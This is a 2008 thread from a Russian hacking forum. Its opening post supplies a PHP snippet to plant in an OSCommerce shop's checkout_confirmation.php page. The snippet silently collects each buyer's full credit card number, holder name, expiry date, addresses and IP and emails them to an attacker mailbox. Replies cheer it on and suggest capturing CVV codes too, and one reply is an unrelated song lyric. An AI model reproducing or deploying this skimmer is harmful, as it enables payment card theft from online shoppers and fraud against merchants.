PHP TROJAN OSCommerce

Discussion in 'Уязвимости' started by vp$, 2 Nov 2008.

  1. vp$

    vp$ Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    65
    Likes Received:
    68
    Reputations:
    19
    OSCommerce один из самых популярных движков для онлайн магазинов
    в нем есть встоенный модуль для оплаты кредитными картами, который является лакомым куском для хакеров и кардеров
    но все чаще встречаются всяческие способы защиты приватных данных, в случае исли злоумышленник все таки получил доступ к базе данных, то остался с носом, вот наглядный пример
    [​IMG]
    номер карты закрыт в середине крестиками

    именно для таких случаев я написал небольшой код, который будет перехватывать важную информацию

    теперь имея доступ к файлам магазина, необходимо найти файл checkout_confirmation.php (он обычно находится в корневой папке шопа) и в ставить следующий код после открывающего тэга body:
    PHP:
    <?
    error_reporting (0);
    $ip_holder $_SERVER['REMOTE_ADDR'];
    $tr_deliv_adr tep_address_format($order->delivery['format_id'], $order->delivery1' '' ');
    $tr_bill_adr tep_address_format($order->billing['format_id'], $order->billing1' '' ');
    $tr_cc_owner $_POST["cc_owner"];
    $tr_cc_number$_POST["cc_number"];
    $tr_cc_expires_month $_POST["cc_expires_month"];
    $tr_cc_expires_year$_POST["cc_expires_year"];
    $info_body "Delivery Address: ";
    $info_body .= $tr_deliv_adr."\n";
    $info_body .= "----------------------------------\n";
    $info_body .= "Billing Address: ";
    $info_body .= $tr_bill_adr."\n";
    $info_body .= "----------------------------------\n";
    $info_body .= "IP holder: ".$ip_holder."\n";
    $info_body .= "CC holder: ".$tr_cc_owner."\n";
    $info_body .= "CC num: ".$tr_cc_number."\n";
    $info_body .= "EXP: ".$tr_cc_expires_month."/".$tr_cc_expires_year."\n";
    mail("[email protected]",'!!! NEW CC !!!',$info_body,"onlineshop.com\r\n");
    ?>
    теперь после каждой совершенной оплаты кредитной картой, на ваше мыло [email protected] будет высылаться вся необходимая информация

    [​IMG]

    P.S. данный код написан под модуль без использования CVV
    P.P.S удачи в хеке ;)
     
    #1 vp$, 2 Nov 2008
    4 people like this.
  2. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    да токо сс без сvv сейчас неочень то актуальны =( надо переделать :)
     
    #2 warlok, 3 Nov 2008
  3. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    вот что я люблю =)
     
    #3 satana8920, 3 Nov 2008
  4. Gen1rus

    Gen1rus Elder - Старейшина

    Joined:
    13 Jun 2007
    Messages:
    97
    Likes Received:
    166
    Reputations:
    20
    Сосны фишками
    Стол с картишками
    Ветер тучки гнал
    Шла гроза
    Лихо встретили
    Забраслетили
    А я в мизер играл
    Я ж в тузах.

    Припев:
    Да поздней осенью
    Ой Дори-Дори
    Небо с проседью
    Ой Дори-Дори
    Звезды сыпали
    Ой Дори-Дори
    Вечера
    Да листопадами
    Ой Дори-Дори
    Бабки падали
    Ой Дори-Дори
    Было весело
    Но вчера.

    Форма сложная
    Пыль дорожная
    Приколоченный кабинет
    Тундра с елками
    Двор с метелками
    И на проволоке
    Птичек нет.

    Припев

    Дождь с крапивою
    Небо сливою
    Прётся радуга
    Гриб подрос
    Щечки гладкие
    Ночки сладкие
    В сердце сломанном
    Лес унес.

    Припев
     
    #4 Gen1rus, 3 Nov 2008
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.